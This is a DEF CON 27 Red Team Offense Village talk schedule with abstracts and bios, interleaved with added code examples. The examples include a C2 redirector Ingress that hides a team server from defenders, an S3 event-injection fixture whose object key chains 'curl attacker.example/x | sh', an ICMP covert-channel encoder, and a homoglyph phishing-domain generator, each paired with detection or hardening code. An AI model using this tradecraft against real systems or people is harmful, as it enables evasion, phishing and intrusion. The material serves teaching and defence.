© Copyright 2019 Red Team Offense Village - All Rights Reserved


The following is the schedule of the presentations at the DEF CON 27 Red Team Offense Village.

Friday, August 9

Saturday, August 10

Sunday, August 11

Abstracts and Bios


Kube-Red C2 Operations on Kubernetes

This talk explores deploying and dynamically generating C2 services on Kubernetes! Everything will be extremely practical with walkthroughs of detailed deployment configurations. Building containers for popular C2 platforms, such as Cobalt Strike, and many others, will be covered. Rapidly deploying complex C2 infrastructure using tools such as Kops and Drone and managing DNS and TLS using Kubernetes will be discussed. Attendees will learn how to build complex redirecting logic to sandbag defenders, using the rewriting and filtering capabilities found in the Nginx Ingress Controller, and the Istio Service Mesh. In addition, monitoring the health of implants using Prometheus will be reviewed.

About Larry Suto: Larry is an independent security consultant based out of Oakland, CA. He spends a lot of time researching using cloud infrastructure for all types of security testing. He spends some time on Windows security as well. Twitter: @larrysuto
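
The redirector logic the abstract refers to, sketched as an added Ingress example (the editor's illustration, not material from the talk or any Kube-Red project code): the Nginx Ingress Controller's configuration-snippet annotation injects raw nginx directives into the location block it generates, here a User-Agent filter that bounces anything that is not the implant to a decoy site, with TLS left to cert-manager. The hostname, User-Agent string, service name, decoy URL and cluster issuer are placeholders.

```yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: c2-redirector
  annotations:
    # Assumes cert-manager is installed and has a ClusterIssuer of this name.
    cert-manager.io/cluster-issuer: "letsencrypt"
    # Raw nginx directives placed inside the generated location block.
    # Only requests whose User-Agent matches the implant's exact string are
    # proxied to the team server; everything else (sandboxes, analysts,
    # scanners) gets a 302 to a benign decoy and never sees the C2 backend.
    nginx.ingress.kubernetes.io/configuration-snippet: |
      if ($http_user_agent !~ "^UpdateAgent/2\.1 \(Windows NT 10\.0; Win64; x64\)$") {
        return 302 https://www.example.com$request_uri;
      }
spec:
  ingressClassName: nginx
  tls:
  - hosts:
    - cdn-updates.example.com
    secretName: c2-redirector-tls   # populated by cert-manager
  rules:
  - host: cdn-updates.example.com
    http:
      paths:
      - path: /updates              # staging/callback prefix the implant uses
        pathType: Prefix
        backend:
          service:
            name: teamserver        # ClusterIP Service in front of the C2 pod
            port:
              number: 443
```

Two caveats a practitioner would check before relying on this: a User-Agent match is a filter against casual crawling, not authentication, so the team server must still enforce its own checks; and newer ingress-nginx releases refuse snippet annotations unless allow-snippet-annotations is enabled in the controller ConfigMap, because the same mechanism lets any tenant who can create an Ingress inject arbitrary nginx configuration.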

Through the Looking Glass: Own the Data Center

The data center embodies the heart of many businesses on the Internet. It contains much of the information in a centralized location which provides a huge incentive for those who would wish harm. The data centers in the realm of Cloud may no longer contain just a single entity, but many individual tenants that attach to a common fabric. The Cisco Application Centric Infrastructure (ACI) aims to meet these needs with a multi-tenant, scalable fabric that interconnects physical hosts, VMs and containers. ACI is Cisco's answer to the centrally-managed Software Defined Network (SDN). The Application Policy Infrastructure Controller (APIC) and Nexus 9000 series switches form the brains and backbone of ACI.
A member of Cisco's Advanced Security Initiatives Group (ASIG) will demonstrate their findings during an evaluation of ACI and the APIC, more than three years before the BH2019 talk "APIC's Adventures in Wonderland." Step into the mind of an attacker and scan, probe, and interact with the network fabric to progress from an unauthenticated user to administrator and root of the data center switch fabric. Once inside the system, see how the APIC can be modified in a nearly undetectable manner to provide the attacker unfettered internal access to all the interconnected hosts and VMs in the data center. The target audience for this talk includes those with a technical interest in offensive discovery and secure product development. Participants will receive an overview of how a data center product is viewed in an offensive light.

About Chris McCoy: Chris is a technical leader in Cisco's Advanced Security Initiatives Group (ASIG) and published author of Security Penetration Testing, The Art of Hacking Series LiveLessons with Cisco Press. He has over 20 years of experience in the networking and security industry. He has a passion for computer security, finding flaws in mission-critical systems, and designing mitigations to thwart motivated and resourceful adversaries. He was formerly with Spirent Communications and the U.S. Air Force. Chris is CCIE certified (Emeritus) in the Routing & Switching and Service Provider tracks, which he has held for over 10 years. Twitter: @chris_mccoy

Bypassing MacOS Detections with Swift

This talk is centered around red teaming in macOS environments. Traditionally, macOS post exploitation has largely been done in Python. However, as defender tradecraft continues to evolve with detecting suspicious Python usage on macOS, we (as red teamers) should consider migrating to different post exploitation methods. In this talk, I will share why the Swift language can be beneficial for red teaming macOS environments. I will also share some macOS post exploitation code I have written using the Swift programming language and contrast detection techniques between Python and Swift based post exploitation.

High Level Outline:
- Intro
- Why Is This Talk Relevant to Red (and Blue) Teamers?
- Why Migrate Away from Python-Based macOS Post Exploitation?
- Examples of Python-Based Post Exploitation
- Python-Based Post Exploitation Artifacts
- Brief Overview of Swift
- Why Use Swift for macOS Post Exploitation?
- Examples of macOS post exploitation in Swift
- Share my Swift-based post exploitation code for red teamer use

About Cedric Owens: Cedric is an offensive security engineer with a blue team background. His passion revolves around red teams and blue teams working closely together to improve each other's tradecraft. Cedric enjoys writing useful red team utilities and periodically writing posts that are of interest to red and blue team members on his blog at
Twitter: @cedowens

(Ab)using GPOs for Active Directory Pwnage

Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attacks paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.

In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.

About Petros Koutroumpis: Petros Koutroumpis is a penetration tester for MWR InfoSecurity, where he has performed a number of purple team and adversary simulation assessments. His research is mainly focused on Active Directory exploitation and offensive tooling development. Twitter: @pkb1s

About Dennis Panagiotopoulos: Dennis Panagiotopoulos is a penetration tester at MWR InfoSecurity. He has performed a wide variety of engagements ranging from whitebox, objective-based assessments to red teams. His research interests are Windows post-exploitation and Active Directory. He likes to spend his free time developing new tools and contributing to open source projects for the InfoSec community. Twitter: @den_n1s

Injections Without Borders: An Anatomy of Serverless Event Injections

Serverless applications have seen a significant rise in adoption in the past year. Along with its advantages, serverless architecture presents new security challenges. Some of these security threats are equal to those we know from traditional application development and some take a new form.

One particular example is injection attacks. Yes, SQL/NoSQL, OS and code injection attacks all still exist. But when dealing with a monolithic application we only have one way in. What happens when we move to a serverless architecture and lose the perimeter? Code is no longer executed directly, but through cloud events, whether it's a file upload, an email sent, a notification received or a simple log entry.

In this talk, I will examine the #1 serverless risk, Event Injection, and will demonstrate injection attacks from multiple event types.

About Tal Melamed: In the past year, Tal has been experimenting in offensive and defensive security for the serverless technology, as part of his role as Head of Security Research at Protego Labs. Specializing in AppSec, he has more than 15 years of experience in security research and vulnerability assessment, previously working for leading security organizations such as Synack, AppSec Labs, CheckPoint, and RSA. Tal is also the leader and creator of the OWASP Serverless Top 10 and DVSA projects.
Twitter: @_nu11p0inter | @dvsaowasp
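
The file-upload case from the abstract, worked through as an added example (the editor's code, not material from the talk, Protego or the DVSA project): an S3 ObjectCreated event hands a function an attacker-chosen object key, and a thumbnailer that splices the decoded key into a shell command line is OS command injection with no HTTP request anywhere in the path. The event, bucket and file names are constructed; the hardened builder allow-lists the key and hands an argv list to subprocess, so no shell ever parses it.

```python
"""Event injection via an S3 object key: the vulnerable builder beside the fix.
Added example for this listing; not code from the talk, Protego or OWASP DVSA."""
from __future__ import annotations
import re
import subprocess
from urllib.parse import unquote_plus

# Constructed S3 ObjectCreated event. The key is attacker-controlled (whoever can
# upload names the object) and arrives URL-encoded, which is how S3 delivers it.
MALICIOUS_EVENT = {
    "Records": [{
        "eventSource": "aws:s3",
        "s3": {
            "bucket": {"name": "uploads-bucket"},
            "object": {"key": "photo.jpg%3B+curl+attacker.example%2Fx+%7C+sh"},
        },
    }]
}
BENIGN_EVENT = {
    "Records": [{
        "eventSource": "aws:s3",
        "s3": {"bucket": {"name": "uploads-bucket"}, "object": {"key": "photo.jpg"}},
    }]
}


def object_key(event: dict) -> str:
    """What most handlers do first: undo S3's URL-encoding of the key.
    This step is what turns %3B and %7C back into ';' and '|'."""
    return unquote_plus(event["Records"][0]["s3"]["object"]["key"])


def vulnerable_command(event: dict) -> str:
    """Builds the string a naive thumbnail function would pass to os.system().
    The decoded key lands inside a shell command line, so ';' and '|' in the
    key terminate the intended command and start the attacker's."""
    key = object_key(event)
    return f"convert /tmp/{key} -resize 200x200 /tmp/thumb_{key}"


# Allow-list for keys this function is willing to process: a plain file name,
# no path separators, no shell metacharacters, bounded length.
SAFE_KEY = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$")


def hardened_argv(event: dict) -> list[str]:
    """Validates the key against the allow-list and returns an argv list for
    subprocess.run(..., shell=False). No shell parses the list, so a key that
    slipped past validation still could not chain a second command."""
    key = object_key(event)
    if not SAFE_KEY.match(key) or ".." in key:
        raise ValueError(f"rejected object key: {key!r}")
    return ["convert", f"/tmp/{key}", "-resize", "200x200", f"/tmp/thumb_{key}"]


def handler(event: dict, context=None) -> dict:
    """Lambda-style entry point using the hardened builder."""
    argv = hardened_argv(event)
    subprocess.run(argv, check=True)  # shell=False is the default
    return {"processed": argv[1]}
```

The same shape recurs for every event source the abstract lists: the injected value arrives in an SNS message body, an SES header, a CloudWatch log line or a DynamoDB stream record instead of a query string, and the fix is identical, validate the field against what the function actually needs and never let it reach a shell, a query string or an eval.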

Introduction and Application of Covert Channels

Red Teams must operate under the radar, and one way to achieve that, or delay discovery of a communication method, is by using covert channels. In this talk, Aaron will quickly touch on the history and science behind covert channels, before diving into how they can be used to conceal active C2 channels. This talk will also cover a walkthrough of a stealthy ICMP covert channel, and general methodology of developing new covert channels for other protocols or communication mediums.

About Aaron "dyn" Grattafiori: Aaron "dyn" Grattafiori leads the Red Team at Facebook, where he focuses on offensive security, vulnerability research, adversary simulation, and performing bold full scope operations. Aaron has spoken at national security conferences such as Black Hat and DEFCON as well as regional conferences such as Toorcon and SOURCE. This will be Aaron's 16th DEFCON. Twitter: @dyn___
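
A minimal ICMP channel of the kind the abstract walks through, written here as an added example (the editor's code, not the speaker's) so the mechanics and the defender's counter are both visible: covert bytes ride in the 8-byte slot where a default Linux ping stores its struct timeval, the rest of the payload keeps ping's 0x10..0x3F pattern and the packet length stays at 56 bytes, and the checksum is computed properly so nothing on the path rejects it. The detection side shows why that slot is a poor hiding place: a real timestamp has to be near capture time and its microsecond field below one million. Little-endian timeval layout, the identifier and the message are assumptions.

```python
"""ICMP echo covert channel: encoder, decoder and the defender's sanity checks.
Added example; not code from the talk."""
from __future__ import annotations
import struct

# Payload layout of a default Linux `ping`: 8-byte struct timeval (host byte
# order; little-endian assumed here) followed by the fixed pattern 0x10..0x3F.
PATTERN = bytes(range(0x10, 0x40))
SLOT = 8  # covert bytes per packet, hidden in the timeval slot


def inet_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement checksum over 16-bit words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(int.from_bytes(data[i:i + 2], "big") for i in range(0, len(data), 2))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo(ident: int, seq: int, payload: bytes) -> bytes:
    """ICMP type 8 (echo request) with a valid checksum; no IP header."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload


def parse_echo(pkt: bytes) -> dict:
    """Splits an ICMP packet; a checksum over the whole packet must fold to 0."""
    typ, code, _, ident, seq = struct.unpack("!BBHHH", pkt[:8])
    if inet_checksum(pkt) != 0:
        raise ValueError("bad ICMP checksum")
    return {"type": typ, "code": code, "id": ident, "seq": seq, "payload": pkt[8:]}


def build_ping(ident: int, seq: int, sec: int, usec: int) -> bytes:
    """What a legitimate Linux ping looks like on the wire."""
    return build_echo(ident, seq, struct.pack("<II", sec, usec) + PATTERN)


def encode_covert(message: bytes, ident: int) -> list[bytes]:
    """Hide `message` in the timeval slot of otherwise normal-looking pings.
    Length-prefixed and zero-padded to whole slots; seq counts up like ping."""
    data = struct.pack("!H", len(message)) + message
    data += b"\x00" * (-len(data) % SLOT)
    return [build_echo(ident, seq, data[i:i + SLOT] + PATTERN)
            for seq, i in enumerate(range(0, len(data), SLOT), start=1)]


def decode_covert(packets: list[bytes]) -> bytes:
    """Reassemble by sequence number (packets may arrive out of order)."""
    echoes = sorted((parse_echo(p) for p in packets), key=lambda e: e["seq"])
    data = b"".join(e["payload"][:SLOT] for e in echoes)
    (length,) = struct.unpack("!H", data[:2])
    return data[2:2 + length]


def flag_echo(pkt: bytes, now: int) -> list[str]:
    """Defender checks: pattern bytes intact and a plausible timeval.
    `now` is the capture time in epoch seconds."""
    payload = parse_echo(pkt)["payload"]
    flags = []
    if len(payload) != SLOT + len(PATTERN) or payload[SLOT:] != PATTERN:
        flags.append("payload pattern deviates from ping default")
    if len(payload) >= SLOT:
        sec, usec = struct.unpack("<II", payload[:SLOT])
        if abs(sec - now) > 86400:
            flags.append("timestamp not within a day of capture time")
        if usec >= 1_000_000:
            flags.append("microsecond field out of range")
    return flags
```

Sending these requires a raw socket (socket.SOCK_RAW with IPPROTO_ICMP, root or CAP_NET_RAW), which is deliberately left out so the block runs offline. The detector is the point: a channel that survives it has to keep the timeval plausible, which drops it to a few low-order bits per packet, and that trade between bandwidth and stealth is the methodology question the abstract raises for other protocols.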


SiestaTime, A Red Team Automation Tool for Generation of Long-term Implants and Infrastructure Deployment

Red Team operations require substantial efforts to both create implants and a resilient C2 infrastructure. SiestaTime aims to merge these ideas into a tool with an easy-to-use GUI, which facilitates implant and infrastructure automation. SiestaTime allows operators to provide registrar, SaaS and VPS credentials in order to deploy a resilient and ready to use Red Team infrastructure in less than five minutes. The generated implants will blend in as legitimate traffic by communicating to the infrastructure using SaaS channels (e.g. GMail, Twitter). Use your VPS/Domains battery to deploy staging servers and inject your favorite shellcode for interactive sessions, clone sites and hide your implants ready to be downloaded, deploy more redirectors if they get busted. SiestaTime is built entirely in Golang, with the ability to generate Implants for multiple platforms, interact with different OS resources, and perform efficient C2 communications. Terraform will help to deploy/destroy different Infrastructure.

About Alvaro Folgado: Rebujacker works as a Product Security Engineer at Salesforce. He has multiple years of experience performing penetration tests and security assessments against different technologies, building automation tools for this purpose and performing application-level research. In recent years his field of study has focused on red teaming and automation. The combination of his application-level and offensive security knowledge leads him to build better and stealthier implants that blend in with today's cloud infrastructure and application stack of targeted organizations. Twitter: @rebujacker

Breaking NBAD and UEBA Detection

Network Behavior Anomaly Detection (NBAD) and User and Entity Behavior Analytics (UEBA) are heralded as machine learning fueled messiahs for finding advanced attacks. The data collection and processing methodologies of these approaches create a series of new exploitable vectors that can allow attackers to navigate network and systems undetected. In this session, methods for poisoning data, transforming calculations and preventing alerts will be examined. Proof of concept Python code will be demonstrated and made available. Approaches to harden against these attacks will also be discussed as well as outlining needed changes in detection standards.

About Charles: WitFoo Chief Technology Officer - Charles’ dedication to maturing the craft of InfoSec is built on a diverse career path across the industry. He started his career in InfoSec in the US Navy in 2002 serving as the Network Security Officer at the US Naval Postgraduate School. After leaving active duty, he was a contributing product reviewer for InfoWorld magazine focusing on network security products. Charles spent 7 years running Herring Consulting, a company dedicated to process orchestration, data sharing, and marketing. In 2012, Charles joined the Lancope team as a pre-sales engineer, was promoted to Consulting Security Architect and later to Strategic Account Manager following the acquisition of Lancope by Cisco. In 2014, Charles partnered with veterans of the military, law enforcement and cybersecurity to research new approaches to improve the craft of cybersecurity operations. In 2016, that research resulted in the forming of WitFoo. When not working with cybersecurity heroes, Charles enjoys SCUBA diving with his wife, Mai. Twitter: @charlesherring

BadSalt (Adversarial DevOps)

SaltStack is a robust configuration management utility used by many to achieve DevOps related initiatives in their organizations. Thanks to its open source model, SaltStack can be used by hobbyists, hackers, and corporations alike. Like any open source tool suite out there, that also means individuals with adversarial intent, be it professional or malicious, can also take advantage of this tool. In its simplest case, SaltStack can be used by an adversary as a simple Command and Control server (C2 server). However, if SaltStack is used as intended, an educated adversary can easily turn salt “bad” in more ways than simple command and control.
By re-configuring and automating basic settings within the Salt Master and Salt Minion configurations, it is easy to deploy SaltStack across many systems for any scenario. Coupling this ease of deployment with a basic understanding of configuration management and scripted stagers, the result is a powerful post-exploitation framework with a built-in C2 server that is simply just SaltStack, but in use by an adversary. There are many benefits to using such a tool suite from an adversarial perspective, such as easily bypassing AV with trusted Salt Minions, and taking advantage of the desired state configurations to build out robust, scalable post exploitation persistence modules.
Part of the research conducted was not just on how an adversary might use SaltStack, but also on how they might target a SaltStack environment. Man in the middle attacks are a concerning attack vector against Salt Minions at the time of this research. SaltStack has strong protections against this, but they are not enabled by default due to the need to manually distribute a unique public key. It is up to the individual(s) deploying SaltStack to be sure they enable the proper security features to be safe from these attacks. Fortunately, SaltStack does have a few compensating controls that make this less likely after a successful deployment, but it is important that all SaltStack users are made aware of the importance and impact that just one particular setting can have on their infrastructure. Fortunately methods of detecting this activity are clear and well documented, but unfortunately a successful attack usually means root access on the target, which could result in an adversary clearing their tracks. This could make it difficult to perform root cause analysis unless network traffic was analyzed at the time of the event.
The overall goal of this research is to show how advances in tools for perfectly legitimate Information Technology initiatives, like DevOps, can be turned into sophisticated tool suites for attackers. In true hacker spirit, this technology can be used for completely unintended purposes. This presentation will provide the insight to how SaltStack could be attacked or used in an adversarial context, and also how those attacks or uses could be detected and prevented.

About Casey Erdmann: Casey Erdmann, also known as 3ndG4me by his CTF teammates and online social communities, is an avid offensive security nerd. Casey is 23 years old, and has a love for CTFs and application security. He is the co-founder of DC706, and is active in his local computer security community. Casey has been responsible for implementing infrastructure for local high-school CTF competitions, and coaching his local university’s SECCDC team. Casey is also responsible for developing the OpenVPN Connect module for the WiFi Pineapple, as well as Propane King of the Hill, a NetKotH rewrite inspired by members of DC 404. When he isn’t writing neat tools, or reaching out to his local community, Casey spends about 90% of his free time researching the latest offensive security news/techniques and playing CTFs trying to “get good”, with the other 10% being writing music, playing video games, or optional sleep. Twitter: @3ndG4me_
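
The abstract does not name the setting whose absence leaves minions open to a man in the middle on first contact. As an added illustration (the editor's, not the speaker's material), the minion-side configuration below contrasts the default, where a minion trusts whichever public key the host answering as the master presents, with the pinning Salt documents: master_finger, the master key fingerprint distributed out of band, and optionally a master-signed public key the minion verifies. The master hostname is a placeholder.

```yaml
# /etc/salt/minion

# Weak (default). On first connect the minion caches whatever master public
# key it receives and trusts it from then on. An attacker who can answer for
# the master's name (DNS, ARP, a rogue host during provisioning) is then the
# master, and the master runs arbitrary code on the minion as root.
master: salt.corp.example
# hash_type: sha256   # the fingerprint below must be taken with the same hash

# Hardened: pin the master's public key fingerprint. Obtain it on the master
# with `salt-key -F` and carry it to the minion out of band (image, config
# management bootstrap, manual entry), before the minion's first connection.
# A mismatch makes the minion refuse the key instead of caching it.
master_finger: 'REPLACE-WITH-OUTPUT-OF-salt-key-F'

# Stronger: the master signs its public key with a separate key pair.
# Master config:  master_sign_pubkey: True   (creates master_sign.pem/.pub)
# Copy master_sign.pub into /etc/salt/pki/minion/ on each minion, then:
verify_master_pubkey_sign: True
```

To check what an already-deployed minion actually trusts, `salt-call --local key.finger_master` prints the fingerprint of the master key the minion has cached; comparing it against `salt-key -F` on the real master is the after-the-fact test for a minion that was enrolled without pinning.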

Red Team Framework (RTF)

Abstract and Bio coming soon!

WebSploit 2.0 Release and an Intense Introduction to Hacking Web Applications and APIs 

In this talk a new version of the self-contained WebSploit VM will be released. WebSploit was created by Omar Santos for different Cybersecurity Ethical Hacking training sessions that have been delivered in several outlets. This VM contains hundreds of exercises from known intentionally vulnerable applications running in Docker containers on top of Kali Linux; and it also includes several additional tools and a mobile device emulator that can be used to test APIs. Omar will go over several demonstrations on how to get started with this collection of hundreds of exercises and participants will receive a lab guide that they can complete in their own time (which covers dozens of exercises).

About Omar Santos: Omar is an active member of the security community, where he leads several industry-wide initiatives and standard bodies. His active role helps businesses, academic institutions, state and local law enforcement agencies, and other participants that are dedicated to increasing the security of the critical infrastructure. Omar is the author of over 20 books and video courses; numerous white papers, articles, and security configuration guidelines and best practices. Omar is a Principal Engineer of Cisco’s Product Security Incident Response Team (PSIRT) where he mentors and leads engineers and incident managers during the investigation and resolution of security vulnerabilities. Twitter: @santosomar

Casting with the Pros: Tips and Tricks for Effective Phishing

Phishing seems easy enough, but getting successful results can be difficult. In this talk we'll walk through practical tips for getting better responses. We'll talk about target selection, ruse development, technology deployment, and suggestions for working with clients to maximize the value of the assessment.

About Nathan Sweaney: Nathan works for Secure Ideas testing pens and consulting clients. He's been in the infosec industry for a decade or so working with a wide range of clients and technologies. He's regularly told that he takes all of the fun out of things and is eager to argue about politics and religion. Hailing from the great state of Oklahoma, he hopes you'll all keep flying over it & leave us alone. Twitter: @sweaney


State of Red Team Services Roundtable

Wesley McGrew, Director of Cyber Operations at HORNE Cyber, leads a panel discussion, taking a frank look at the state of offense-oriented services, such as penetration tests and red team engagements. The goal is to look at the current state of offense-oriented services, and discuss what it will take for the discipline to mature and adapt.

Among the topics open for discussion:
- Terminology
- Trends in penetration testing and red teaming
- Managing large scale engagements
- Tradecraft
- Client interactions
- Effective reporting

Dr. McGrew will present questions to a panel of red team professionals, and chime in with his outlook as well. Questions for the panel will also be solicited from the audience.
The panel will try to address the issues faced by experienced red team and related service professionals, and those that manage the engagements. Those getting started in this field are encouraged to attend in order to see the evolving structure of this industry, beyond entry-level jobs.

About Dr. Wesley McGrew: As Director of Cyber Operations at HORNE Cyber, Wesley McGrew oversees and participates in offense-oriented services for clients in many areas, including finance, healthcare, manufacturing, and national critical infrastructure. He has presented on topics of penetration testing and malware analysis at DEF CON and Black Hat USA. He teaches a self-designed course on reverse engineering to students at Mississippi State University, using real-world, high-profile malware samples. Wesley has a Ph.D. in Computer Science from Mississippi State University for his research in vulnerability analysis of SCADA HMI systems. Twitter: @McGrewSecurity

Puny Charge your Phishing Campaigns

Verizon's 2019 Data Breach Investigation Report (DBIR) indicates that malware is delivered via email in 94% of investigated breaches. Business Email Compromise (BEC) is on the rise. Phishing is still a problem for most organizations. A good phishing campaign is still an easy win for a Red Teamer, though it’s a constant cat-and-mouse game as email gateways deploy new techniques for anti-spoofing and malware detection. This talk will discuss research and browser/app testing around using Punycode to create solid doppelganger domains for phishing campaigns, watering hole attacks and other creative shenanigans. Using techniques discussed in this talk, you will be able to clone your target's domain name(s) so that they appear identical to the naked eye. Passing SSL/TLS verification and bypassing security awareness training and any in-house phishing campaigns your Blue Team might have implemented, this is a $12 technique you must see.

About Michael Wylie: Michael Wylie, MBA, CISSP is the Director of Cybersecurity Services at Richey May Technology Solutions. In his role, Michael is responsible for delivering information assurance by means of vulnerability assessments, cloud security, penetration tests, risk management, and training. Michael has developed and taught numerous courses for the U.S. Department of Defense, Moorpark College, California State Universities, and for clients around the world. Michael is the winner of the SANS Continuous Monitoring and Security Operations challenge coin and holds the following credentials: CISSP, CCNA R&S, CCNA CyberOps, GPEN, TPN, CEH, CEI, VCP-DCV, CHPA, PenTest+, Security+, Project+, and more. Twitter: @TheMikeWylie
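
What "Punycode doppelganger" means in practice, as an added example (the editor's code, not the speaker's research or tooling), going one step beyond the abstract by including the detection side: a domain containing non-ASCII letters is registered in its xn-- form, which is also the name that goes on the certificate, so TLS validation is satisfied for the look-alike as much as for the real thing. The generator swaps Latin letters for Cyrillic ones that render identically; the detector decodes observed names (from CT logs, DNS or proxy logs) and flags a label that mixes scripts, or an all-Cyrillic label that spells a watched brand character-for-character. The brand "acepay", the .example parent and the confusable table are constructed for the example.

```python
"""IDN homograph (punycode) doppelgangers: generation and detection.
Added example for this listing; not the speaker's material."""
from __future__ import annotations
import unicodedata

# Cyrillic lowercase letters that render like Latin ones in common fonts.
# Constructed subset for this example; Unicode's confusables.txt is the full list.
CYRILLIC_CONFUSABLES = {
    "a": "\u0430", "c": "\u0441", "e": "\u0435", "i": "\u0456", "j": "\u0458",
    "o": "\u043e", "p": "\u0440", "s": "\u0455", "x": "\u0445", "y": "\u0443",
}
LATIN_OF = {v: k for k, v in CYRILLIC_CONFUSABLES.items()}


def to_ascii(domain: str) -> str:
    """Unicode domain -> A-label form (xn--...): what gets registered and what
    the certificate's SAN carries, so TLS sees nothing unusual."""
    return domain.encode("idna").decode("ascii")


def to_unicode(domain: str) -> str:
    """A-label form -> U-label form: what a client renders if it does not
    apply a script-mixing policy to the name."""
    return domain.encode("ascii").decode("idna")


def homoglyph_domains(target: str) -> list[tuple[str, str]]:
    """Look-alikes for the left-most label of `target`, as (unicode, xn--) pairs:
    every single-character swap, plus the whole-script variant when every
    character has a confusable (that one mixes no scripts at all)."""
    label, _, parent = target.partition(".")
    out = []
    for i, ch in enumerate(label):
        if ch in CYRILLIC_CONFUSABLES:
            u = label[:i] + CYRILLIC_CONFUSABLES[ch] + label[i + 1:] + "." + parent
            out.append((u, to_ascii(u)))
    if all(ch in CYRILLIC_CONFUSABLES for ch in label):
        u = "".join(CYRILLIC_CONFUSABLES[ch] for ch in label) + "." + parent
        out.append((u, to_ascii(u)))
    return out


def _script(ch: str) -> str | None:
    """Script of a letter from its Unicode name; digits and '-' count as none."""
    first = unicodedata.name(ch, "").split(" ", 1)[0]
    return first if first in {"LATIN", "CYRILLIC", "GREEK"} else None


def analyse(domain: str, watchlist: tuple[str, ...] = ("acepay",)) -> dict:
    """Defender side. Accepts either form; decodes xn-- labels, then flags
    mixed-script labels and all-Cyrillic labels whose Latin skeleton is a
    watched brand (the whole-script case that browsers' mixing rules miss)."""
    uni = to_unicode(domain) if domain.isascii() else domain
    mixed = whole = False
    for label in uni.split("."):
        scripts = {s for s in map(_script, label) if s}
        if len(scripts) > 1:
            mixed = True
        if scripts == {"CYRILLIC"}:
            skeleton = "".join(LATIN_OF.get(c, c) for c in label)
            if skeleton in watchlist:
                whole = True
    return {"unicode": uni, "mixed_script": mixed,
            "whole_script": whole, "suspicious": mixed or whole}
```

The split between the two flags matters for the blue team: modern browsers already show the xn-- form for labels that mix scripts, which is why the whole-script variant (every letter Cyrillic) is the one still worth registering, and why a watchlist-driven skeleton comparison, not a script-mix check alone, is what has to run against newly issued certificates and newly observed domains.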

A Panel and Active Discussion: Red Team Career Advice

A panel of several Red Team members will talk about Red Team and Offensive Security career advice. This will also be an active discussion with the audience! This is a great opportunity to learn from others and also share your experience, highlight how you got started, and how you became a leader in your field.